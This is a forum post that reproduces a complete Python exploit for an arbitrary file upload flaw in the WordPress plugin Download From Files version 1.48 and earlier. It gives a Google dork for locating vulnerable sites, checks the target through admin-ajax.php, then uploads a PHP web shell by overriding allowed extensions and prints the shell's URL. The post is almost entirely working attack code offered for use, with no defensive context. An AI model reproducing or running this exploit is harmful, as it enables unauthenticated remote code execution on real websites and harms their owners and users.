WordPress Download From Files 1.48 Shell Upload

#303
Topic created · 1 Posts · 3 Views
  • # Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
    # Google Dork: inurl:/wp-content/plugins/download-from-files
    # Date: 10/09/2021
    # Exploit Author: spacehen
    # Vendor Homepage: https://wordpress.org/plugins/download-from-files/
    # Version: <= 1.48
    # Tested on: Ubuntu 20.04.1 LTS (x86)
    
    import os.path
    from os import path
    import json
    import requests;
    import sys
    
    def print\_banner():
     print("Download From Files <= 1.48 - Arbitrary File Upload")
     print("Author -> spacehen (www.github.com/spacehen)")
    
    def print\_usage():
     print("Usage: python3 exploit.py [target url] [php file]")
     print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
    
    def vuln\_check(uri):
     response = requests.get(uri)
     raw = response.text
    
     if ("Sikeres" in raw):
     return True;
     else:
     return False;
    
    def main():
    
     print\_banner()
     if(len(sys.argv) != 3):
     print\_usage();
     sys.exit(1);
    
     base = sys.argv[1]
     file\_path = sys.argv[2]
    
     ajax\_action = 'download\_from\_files\_617\_fileupload'
     admin = '/wp-admin/admin-ajax.php';
    
     uri = base + admin + '?action=' + ajax\_action ;
     check = vuln\_check(uri);
    
     if(check == False):
     print("(*) Target not vulnerable!");
     sys.exit(1)
    
     if( path.isfile(file\_path) == False):
     print("(*) Invalid file!")
     sys.exit(1)
    
     files = {'files[]' : open(file\_path)}
     data = {
     "allowExt" : "php4,phtml",
     "filesName" : "files",
     "maxSize" : "1000",
     "uploadDir" : "."
     }
     print("Uploading Shell...");
     response = requests.post(uri, files=files, data=data )
     file\_name = path.basename(file\_path)
     if("ok" in response.text):
     print("Shell Uploaded!")
     if(base[-1] != '/'):
     base += '/'
     print(base + "wp-admin/" + file\_name);
     else:
     print("Shell Upload Failed")
     sys.exit(1)
    
    main();
     
    
    
Log in to reply